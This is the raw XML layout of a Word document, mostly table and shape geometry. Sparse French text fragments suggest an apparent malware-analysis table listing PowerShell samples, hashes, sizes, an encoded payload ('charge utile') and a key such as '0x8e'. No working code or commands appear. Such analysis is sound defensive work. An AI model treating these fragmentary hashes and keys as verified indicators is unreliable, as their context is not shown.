                            <a:pt x="3669664" y="35115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596264" y="35115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92320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1342399</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5727065" cy="8270875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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82708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8270875">
                          <a:moveTo>
                            <a:pt x="3670299" y="8270875"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="8270875"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="7564119"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="7564119"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="8270875"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="8270875"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="8270875"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="7564119"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="7564119"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="8270875"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="8270875"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="8270875"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="7564119"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="7564119"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="8270875"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="7563484"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="7563484"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="7000239"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="7000239"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="7563484"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="7563484"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="7563484"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="7000239"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="7000239"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="7563484"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="7563484"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="7563484"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="7000239"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="7000239"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="7563484"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="6999604"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="6999604"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="6292850"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="6292850"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="6999604"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="6999604"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="6999604"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="6292850"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="6292850"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="6999604"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="6999604"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="6999604"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="6292850"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="6292850"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="6999604"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="6292215"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="6292215"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="5585460"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="5585460"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="6292215"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="6292215"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="6292215"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="5585460"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="5585460"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="6292215"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="6292215"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="6292215"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="5585460"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5585460"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="6292215"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="5584824"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="5584824"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="4878070"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="4878070"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="5584824"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="5584824"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="5584824"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="4878070"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="4878070"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="5584824"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="5584824"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="5584824"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="4878070"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4878070"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5584824"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="4877434"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="4877434"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="4315459"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="4315459"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="4877434"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="4877434"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="4877434"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="4315459"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="4315459"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="4877434"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="4877434"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="4877434"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="4315459"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4315459"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4877434"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="4314825"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="4314825"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="3572509"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="3572509"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="4314825"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="4314825"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="4314825"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="3572509"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="3572509"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="4314825"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="4314825"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="4314825"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="3572509"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3572509"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4314825"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="3571875"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="3571875"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="2684780"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="2684780"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="3571875"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="3571875"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="3571875"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="2684780"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="2684780"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="3571875"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="3571875"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="3571875"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="2684780"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2684780"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3571875"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="2684145"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="2684145"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="1977390"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="1977390"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="2684145"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="2684145"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="2684145"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="1977390"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="1977390"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="2684145"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="2684145"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="2684145"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="1977390"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1977390"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2684145"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="1976754"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="1976754"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="1270000"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="1270000"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="1976754"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="1976754"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="1976754"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="1270000"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="1270000"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="1976754"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1976754"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="1976754"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="1270000"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1270000"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1976754"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="1269364"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="1269364"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="562609"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="562609"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="1269364"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="1269364"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="1269364"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="562609"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="562609"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="1269364"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1269364"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="1269364"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="562609"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="562609"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1269364"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="561975"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="56197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561975"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="561975"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="56197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561975"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="561975"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="56197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561975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484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34050" cy="8629650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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050" cy="8629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050" h="8629650">
                          <a:moveTo>
                            <a:pt x="600075" y="6349"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="600075" y="8623300"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3175" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3175" y="8629650"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="8626474"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5734050" y="8626474"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="7919085"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="7919085"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="7355204"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="7355204"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="6647814"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="6647814"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="5940425"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="5940425"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="5233034"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="5233034"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="4670424"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="4670424"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="3927474"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="3927474"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="3039744"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="3039744"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="2332354"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="2332354"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="1624964"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="1624964"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="917574"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="917574"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="354964"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="354964"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="3174"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5734050" y="317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5872" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4570729</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>996959</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="8616950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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616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616950">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="861695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6896" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6628130</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>990609</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="8629650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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86296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8629650">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="862965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20992" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4605020</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1383039</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="364490" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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490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4490" h="199389"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363854" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="363854" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="364490" y="635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25088" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5253355</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2900689</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="363223" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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223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3219" h="199389">
                          <a:moveTo>
                            <a:pt x="0" y="199389"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="363219" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="363219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33280" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4605020</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5132079</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="608968" cy="765810"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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8968" cy="7658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8964" h="765810">
                          <a:moveTo>
                            <a:pt x="635" y="765810"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="635" y="566419"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="363854" y="566419"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="363854" y="765810"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="567054"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="364490" y="567054"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="635" y="199389"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="635" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="608964" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="608964" y="199389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1472" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4605020</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7923539</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1011558" cy="660400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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1558" cy="6604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11554" h="660400">
                          <a:moveTo>
                            <a:pt x="635" y="660400"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="635" y="461010"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="363854" y="461010"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="363854" y="660400"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="461645"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="364490" y="461645"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="648335" y="199390"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="648335" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1011554" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1011554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249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7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352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7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4544" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2922270</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1002053</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="260661" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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66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5568" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1036954</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1002053</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="361941" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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9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Type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6592" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5215890</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1002053</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="803629" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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761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1362975</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3026111" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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583754e5e682ea83d58fbf76ea5c82ea0f2ab5d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8640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1368648</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2004894" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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489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96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1459253</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="555984" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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068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1539505</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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b06e9e52343c4d52f35f0a4a6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171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1565298</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="346714" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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273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2001785</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2062998" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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Powershell (</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle30"/>
                            <w:spacing w:val="-4"/>
                          </w:rPr>
                          <w:t xml:space="preserve">W8d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, 96235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376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2086875</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3026111" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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e7aa24a7ab391d1551bc3d942e945cb96beea96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47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2094253</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="555984" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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580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2184423</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="454681" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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6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octets)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683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2263405</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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79d87f127b77268590734bc34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785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2694328</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2062998" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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Charge utile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31"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> "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sub-encodée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"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888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2794265</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3026111" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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7dfaaac8d7759d47ef94b28501f5e4dd33a302f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99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2801643</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="555984" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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0928" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5272405</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2886298</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="427961" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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96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0x8e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195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2885070</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="683663" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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6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30"/>
                            <w:spacing w:val="9"/>
                          </w:rPr>
                          <w:t xml:space="preserve">SNLk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clé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297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2970795</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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e54c69431673d5e0dd7f7ac43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400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3501655</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3026111" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
